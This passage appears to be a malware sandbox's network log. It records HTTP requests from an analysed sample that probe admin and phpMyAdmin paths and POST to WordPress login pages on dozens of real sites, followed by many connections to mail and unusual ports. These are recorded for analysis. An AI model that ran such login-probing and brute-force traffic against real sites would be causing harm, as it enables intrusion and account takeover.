Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://samson.pe/wp-login.phpContent-Length: 144Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fadministrator%2Findex.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipCookie: originDirect=true; SESSION=d0ba3db7-afea-40d5-bf45-8ca13b5deab0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=cg10ujaipf9k7m41e4afoh39s1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://engel-firm.com/wp-login.phpContent-Length: 154Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gruporegiosafety.com/wp-login.phpContent-Length: 141Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bunasta.eu/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php?wpe-login=true HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=2f496c7315d7d730e29ea20c5d3dfb81User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://tiswheels.com/wp-login.phpContent-Length: 126Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=5afd37c218f5676376cb43a26fed2bbc|11f187638643e13d7bd1963991fac52b; OF=8jsqh0b6dova9dpfri4i3ad415User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=qn6eh6oumdk5qmj0m5efhe7rurUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ik5ObEFRd1R1Zi9HT0oxV2Ircm5UQ2c9PSIsInZhbHVlIjoicURnaEVheXRneW9LMExZd0ZVKzFSYkhteHBSSitDM05jMVF2ZWhOZGJ1TTBkNkFFdi9ZaTN0RVBRTU9GUFM2a0hibWNlYTltcDBJczk3cThMRklYbjBESVh1S1lYbEFIbDAzeS9mbmpzRURJbnAzM3RsdWJsM2tRQUMvQ1ExL3giLCJtYWMiOiI3ZDdiZTY1OTI1YTQ0M2YyMzE2NjE4MTdjNTcyOGY4ZDdkNzNiYzgwNTJmMjA0MWI3Mjc5NjIyMjYzN2M3MmZiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Im5SMUR5aGVYRzk5eVNWOVlBMjdGT2c9PSIsInZhbHVlIjoialJJbk1nRlhJdHVqUlovcjZvNHlVaTlWMWFMTUd2RG5TVFVCekxiU25vcjBGTSt5UWNlRDRiT1BuNWR1WVg0OG5RSVhrblVqcmI0SGpsRjhBNnFtR3NZODdNVEx4RUFxaHgyaFhyUjRXTzhuQ1hsbTNleU1PcUkwUXhQWExZazkiLCJtYWMiOiIyMmJkMjM0YTE0OWMxOWZjYWU0MGE1NTc4OTE1NzNkNGEzNzRhNTY4YjVlMmE5OTNkMTAyYjQ4ZWU2ZWE5NDdkIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJrY2ZQV0RLNEsvZ3BJNUk0VFF1dkE9PSIsInZhbHVlIjoibFFjeElYVkxjYWFLc0UwczNUSUZFeEtvNm5OSmN1M0lpQ2doUHJFUzBqVnRpWUZsWEk1aE92YTVGVmVINUpFWWN4YjM5M29WSHFLb29SNlMvUWFsU09FaFR5blJOV0VVMHYrL3JaTGF6bVY1KzdFeGxxa1dxQUZGUC9rNGF4UGQiLCJtYWMiOiIyOWRkODg5NWE1ZWZiODk5MjM0YjZkMTNkZGZhNjcxMGViOWQyMGVlOWM1OWQyZWY4YzA5YWQ2YjFmZjYzYWY2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ii9jTlJlSTdIWDBqUjEwQkxxQ08weUE9PSIsInZhbHVlIjoiUExnZVdPTGtiWGxNS0xlOHc2YzFtQXNkaGp0bHUyb1I3K2FsNDR2UzJSSld0VGtPbGEybFZEMll6VHZRUFgzK0pTMldRczdXeWkxV20xd0VSRzlyaFliYWVWMFZWRUhVQ2Ixb1NwY3d3NTlyUk1ESHhFOTg1cmVxMHp5VE9QQW4iLCJtYWMiOiIwNjY5NDEyZmY4NTJjNmI4ZjA4ZGEwNjlkMjliZDBhNGJmMzdhYmMzMjcxZWVlNTJkODhmZTlhYTMxMjA4OTRkIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6IjlLZ3o3ZitXTkJMMTc1MHBUSTZrd0E9PSIsInZhbHVlIjoiTTN5QlA4M2RDQmFXR1F6WnV0MjVLRGUyTC82bzlvYnBRSlBuaXJMME96WnZrYjYxL1NRNm1TUFFoREFUOStoM0hRRTNkVGZqa2M5bW5QT21lbG50NmpZcS9kK2ZvWGpoRkhMRzZGekcwaU9kaEV5N29GaTNtQ2oyczZXbEZYaWciLCJtYWMiOiI0NTU5ZTk1NGViNDFjZTAwNWIzZGYyMzEwZjg2YmJlN2JjODZkMzcyNGU0ZGMwMGU1ZjAyMDE1ZDk5ODVmODlhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkJqLzRuT0dNWE1NT1lhV3g3TzdmOHc9PSIsInZhbHVlIjoiVHJuQWlySXVLTURJWG5zd1JjcXFaQzMvQ2ZrRGVhMlZyK0hyL3RkYk9qbXFFaFZPejJmS3J1dDFaYmVIL0xYQTg2RWZxc0xBVitoRU56dHdyMnB3R0c3V29kTmkxdzZaZFkxVmdjdjhucHcyR1ZSY1hrSVA0NGdXSGYwT09QbmwiLCJtYWMiOiIzZDQ1MTNkMDg5OWE3OTQ3NmE3YmM5N2YwMGI3OTI1N2Q2YTM2YjcwZGEzNzJiMDIxMTNkMDg5NTM1NmVmNTU4IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://samson.pe/wp-login.phpContent-Length: 137Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=tdc162qtbgvjr05eq5aoaditjnUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://coralparkchristian.org/wp-login.phpContent-Length: 143Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=tDrWrpYz0sQSHfLN2QI5clVhMz.ytyo40IGQr8aDz4A-1700978385868-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 194.55.13.50:9001
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 46.19.141.85:8100
Source: global trafficTCP traffic: 192.168.2.4:49733 -> 80.66.135.13:9001
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 95.153.32.22:9001
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 217.160.251.63:29001
Source: global trafficTCP traffic: 192.168.2.4:53371 -> 66.81.203.8:995
Source: global trafficTCP traffic: 192.168.2.4:54603 -> 52.101.8.46:143
Source: global trafficTCP traffic: 192.168.2.4:54625 -> 52.101.11.10:143
Source: global trafficTCP traffic: 192.168.2.4:54999 -> 104.47.74.10:143
Source: global trafficTCP traffic: 192.168.2.4:55003 -> 15.222.16.211:995
Source: global trafficTCP traffic: 192.168.2.4:55004 -> 136.143.191.44:995
Source: global trafficTCP traffic: 192.168.2.4:55006 -> 142.250.27.27:995
Source: global trafficTCP traffic: 192.168.2.4:55009 -> 143.244.202.96:143
Source: global trafficTCP traffic: 192.168.2.4:55014 -> 142.250.153.27:143
Source: global trafficTCP traffic: 192.168.2.4:55015 -> 74.208.5.3:143
Source: global trafficTCP traffic: 192.168.2.4:55017 -> 162.159.205.25:995
Source: global trafficTCP traffic: 192.168.2.4:55020 -> 142.251.16.27:995
Source: global trafficTCP traffic: 192.168.2.4:55064 -> 162.241.224.218:995
Source: global trafficTCP traffic: 192.168.2.4:55141 -> 146.20.161.1:995
Source: global trafficTCP traffic: 192.168.2.4:55146 -> 216.69.141.82:995
Source: global trafficTCP traffic: 192.168.2.4:55150 -> 67.195.204.83:995
Source: global trafficTCP traffic: 192.168.2.4:55152 -> 66.45.228.7:143
Source: global trafficTCP traffic: 192.168.2.4:55155 -> 209.85.202.27:995
Source: global trafficTCP traffic: 192.168.2.4:55162 -> 142.250.153.14:995
Source: global trafficTCP traffic: 192.168.2.4:55168 -> 78.128.62.90:143
Source: global trafficTCP traffic: 192.168.2.4:55171 -> 104.47.74.138:995
Source: global trafficTCP traffic: 192.168.2.4:55248 -> 104.47.75.164:143
Source: global trafficTCP traffic: 192.168.2.4:55306 -> 117.20.63.148:2030
Source: global trafficTCP traffic: 192.168.2.4:55545 -> 142.250.153.26:143
Source: global trafficTCP traffic: 192.168.2.4:55547 -> 164.90.197.105:143
Source: global trafficTCP traffic: 192.168.2.4:55550 -> 162.241.62.220:143
Source: global trafficTCP traffic: 192.168.2.4:55551 -> 15.236.236.160:143
Source: global trafficTCP traffic: 192.168.2.4:55552 -> 64.233.184.27:143
Source: global trafficTCP traffic: 192.168.2.4:55559 -> 103.224.212.34:143
Source: global trafficTCP traffic: 192.168.2.4:55566 -> 62.146.106.50:995
Source: global trafficTCP traffic: 192.168.2.4:55575 -> 52.101.68.0:995
Source: global trafficTCP traffic: 192.168.2.4:55579 -> 104.47.55.138:995
Source: global trafficTCP traffic: 192.168.2.4:55580 -> 104.47.73.138:143
Source: global trafficTCP traffic: 192.168.2.4:55581 -> 52.101.11.2:995
Source: global trafficTCP traffic: 192.168.2.4:55582 -> 74.220.219.189:143
Source: global trafficTCP traffic: 192.168.2.4:55588 -> 72.167.58.161:143
Source: global trafficTCP traffic: 192.168.2.4:55591 -> 64.233.184.26:995
Source: global trafficTCP traffic: 192.168.2.4:55592 -> 3.94.41.167:143
Source: global trafficTCP traffic: 192.168.2.4:55610 -> 104.200.30.31:143
Source: global trafficTCP traffic: 192.168.2.4:55614 -> 162.241.24.104:143
Source: global trafficTCP traffic: 192.168.2.4:55629 -> 198.23.53.39:995
Source: global trafficTCP traffic: 192.168.2.4:55695 -> 52.101.9.5:995
Source: global trafficTCP traffic: 192.168.2.4:55794 -> 209.85.202.26:995
Source: global trafficTCP traffic: 192.168.2.4:55827 -> 52.101.132.30:143
Source: global trafficTCP traffic: 192.168.2.4:55838 -> 52.101.11.7:143
Source: global trafficTCP traffic: 192.168.2.4:55848 -> 81.19.159.64:993
Source: global trafficTCP traffic: 192.168.2.4:55878 -> 200.55.156.172:143
Source: global trafficTCP traffic: 192.168.2.4:55882 -> 18.185.115.147:143
Source: global trafficTCP traffic: 192.168.2.4:55884 -> 191.6.220.39:143
Source: global trafficTCP traffic: 192.168.2.4:55914 -> 133.130.97.143:995
Source: global trafficTCP traffic: 192.168.2.4:55919 -> 52.101.73.22:143
Source: global trafficTCP traffic: 192.168.2.4:55922 -> 52.101.42.10:143
Source: global trafficTCP traffic: 192.168.2.4:55934 -> 52.101.68.16:995
Source: global trafficTCP traffic: 192.168.2.4:55940 -> 142.93.233.86:143
Source: global trafficTCP traffic: 192.168.2.4:55943 -> 173.203.187.1:143
Source: global trafficTCP traffic: 192.168.2.4:55970 -> 193.203.239.23:143
Source: global trafficTCP traffic: 192.168.2.4:55972 -> 104.47.17.74:995
Source: global trafficTCP traffic: 192.168.2.4:55976 -> 212.159.8.200:143
Source: global trafficTCP traffic: 192.168.2.4:55994 -> 194.47.252.115:995
Source: global trafficTCP traffic: 192.168.2.4:56025 -> 77.75.77.146:995
Source: global trafficTCP traffic: 192.168.2.4:56027 -> 212.97.32.100:143
Source: global trafficTCP traffic: 192.168.2.4:56092 -> 144.76.107.16:995
Source: global trafficTCP traffic: 192.168.2.4:56175 -> 177.153.23.242:220
Source: global trafficTCP traffic: 192.168.2.4:56593 -> 52.101.40.24:995
Source: global trafficTCP traffic: 192.168.2.4:56822 -> 95.168.220.222:995
Source: global trafficTCP traffic: 192.168.2.4:57029 -> 216.250.121.106:990
Source: global trafficTCP traffic: 192.168.2.4:57766 -> 45.40.150.54:222
Source: global trafficTCP traffic: 192.168.2.4:58441 -> 66.81.203.198:995
Source: global trafficTCP traffic: 192.168.2.4:58685 -> 52.101.9.11:143
Source: global trafficTCP traffic: 192.168.2.4:58687 -> 52.101.9.2:143
Source: global trafficTCP traffic: 192.168.2.4:58888 -> 15.222.16.210:143
Source: global trafficTCP traffic: 192.168.2.4:58981 -> 68.178.213.244:995
Source: global trafficTCP traffic: 192.168.2.4:58982 -> 67.195.228.75:995
Source: global trafficTCP traffic: 192.168.2.4:58997 -> 104.47.75.228:143
Source: global trafficTCP traffic: 192.168.2.4:59062 -> 164.90.197.143:143
Source: global trafficTCP traffic: 192.168.2.4:59068 -> 200.55.156.171:143
Source: global trafficTCP traffic: 192.168.2.4:59094 -> 162.159.205.11:995
Source: global trafficTCP traffic: 192.168.2.4:59193 -> 104.47.73.10:143
Source: global trafficTCP traffic: 192.168.2.4:59194 -> 35.181.18.45:143
Source: global trafficTCP traffic: 192.168.2.4:59201 -> 52.101.73.6:995
Source: global trafficTCP traffic: 192.168.2.4:59203 -> 52.101.40.6:995
Source: global trafficTCP traffic: 192.168.2.4:59204 -> 52.101.40.1:143
Source: global trafficTCP traffic: 192.168.2.4:59205 -> 104.47.59.138:995
Source: global trafficTCP traffic: 192.168.2.4:59215 -> 52.86.6.113:143
Source: global trafficTCP traffic: 192.168.2.4:59226 -> 52.101.137.0:995
Source: global trafficTCP traffic: 192.168.2.4:59237 -> 52.101.9.17:143
Source: global trafficTCP traffic: 192.168.2.4:59239 -> 18.185.115.145:143
Source: global trafficTCP traffic: 192.168.2.4:59255 -> 52.101.11.3:143
Source: global trafficTCP traffic: 192.168.2.4:59257 -> 52.101.137.2:995
Source: global trafficTCP traffic: 192.168.2.4:59265 -> 212.159.9.200:995
Source: global trafficTCP traffic: 192.168.2.4:59273 -> 104.47.17.138:995
Source: global trafficTCP traffic: 192.168.2.4:59315 -> 52.101.42.4:143
Source: global trafficTCP traffic: 192.168.2.4:59317 -> 52.101.9.14:143
Source: global trafficTCP traffic: 192.168.2.4:59322 -> 15.222.16.209:143
Source: global trafficTCP traffic: 192.168.2.4:59325 -> 66.81.203.133:143
Source: global trafficTCP traffic: 192.168.2.4:59364 -> 68.178.213.243:995
Source: global trafficTCP traffic: 192.168.2.4:59395 -> 52.101.42.9:995
Source: global trafficTCP traffic: 192.168.2.4:59473 -> 13.37.195.136:143
Source: global trafficTCP traffic: 192.168.2.4:59485 -> 52.101.132.28:995
Source: global trafficTCP traffic: 192.168.2.4:59497 -> 18.185.115.146:995
Source: global trafficTCP traffic: 192.168.2.4:59503 -> 52.101.40.2:995
Source: global trafficTCP traffic: 192.168.2.4:59508 -> 52.101.73.24:995
Source: global trafficTCP traffic: 192.168.2.4:59514 -> 52.101.8.44:143
Source: global trafficTCP traffic: 192.168.2.4:59519 -> 200.55.156.170:995
Source: global trafficTCP traffic: 192.168.2.4:59522 -> 147.182.130.78:143
Source: global trafficTCP traffic: 192.168.2.4:59526 -> 52.101.68.32:143
Source: global trafficTCP traffic: 192.168.2.4:60241 -> 139.162.169.45:222
Source: global trafficTCP traffic: 192.168.2.4:60242 -> 185.54.192.125:990
Source: global trafficTCP traffic: 192.168.2.4:60244 -> 178.32.41.233:222
Source: global trafficTCP traffic: 192.168.2.4:60254 -> 52.101.11.9:143
Source: global trafficTCP traffic: 192.168.2.4:60298 -> 89.31.143.1:990
Source: global trafficTCP traffic: 192.168.2.4:60348 -> 52.101.73.11:143
Source: global trafficTCP traffic: 192.168.2.4:60405 -> 52.101.42.13:995
Source: global trafficTCP traffic: 192.168.2.4:60508 -> 52.101.9.0:995
Source: global trafficTCP traffic: 192.168.2.4:60537 -> 147.182.160.18:143
Source: global trafficTCP traffic: 192.168.2.4:60710 -> 52.101.8.34:143
Source: global trafficTCP traffic: 192.168.2.4:60873 -> 52.101.8.32:143
Source: global trafficTCP traffic: 192.168.2.4:60906 -> 52.101.73.1:995
Source: global trafficTCP traffic: 192.168.2.4:60979 -> 52.101.8.36:143
Source: global trafficTCP traffic: 192.168.2.4:60991 -> 52.101.40.4:143
Source: global trafficTCP traffic: 192.168.2.4:61031 -> 52.101.68.18:995
Source: global trafficTCP traffic: 192.168.2.4:61120 -> 147.182.189.184:995
Source: global trafficTCP traffic: 192.168.2.4:61138 -> 52.101.42.6:995
Source: global trafficTCP traffic: 192.168.2.4:61141 -> 52.101.73.30:995
Source: global trafficTCP traffic: 192.168.2.4:61211 -> 52.101.73.4:995
Source: global trafficTCP traffic: 192.168.2.4:61214 -> 52.101.68.36:995
Source: global trafficTCP traffic: 192.168.2.4:61220 -> 164.90.197.79:995
Source: global trafficTCP traffic: 192.168.2.4:61252 -> 52.101.73.26:995
Source: global trafficTCP traffic: 192.168.2.4:61296 -> 52.101.68.5:143
Source: global trafficTCP traffic: 192.168.2.4:62009 -> 52.101.8.42:995
Source: global trafficTCP traffic: 192.168.2.4:62162 -> 80.92.66.174:587
Source: global trafficTCP traffic: 192.168.2.4:62239 -> 177.153.23.241:2525
Source: global trafficTCP traffic: 192.168.2.4:62928 -> 109.168.109.224:990
Source: global trafficTCP traffic: 192.168.2.4:62932 -> 191.6.210.8:990
Source: global trafficTCP traffic: 192.168.2.4:62977 -> 104.247.74.107:222
Source: global trafficTCP traffic: 192.168.2.4:63144 -> 162.159.205.17:995
Source: global trafficTCP traffic: 192.168.2.4:63510 -> 81.169.145.157:222
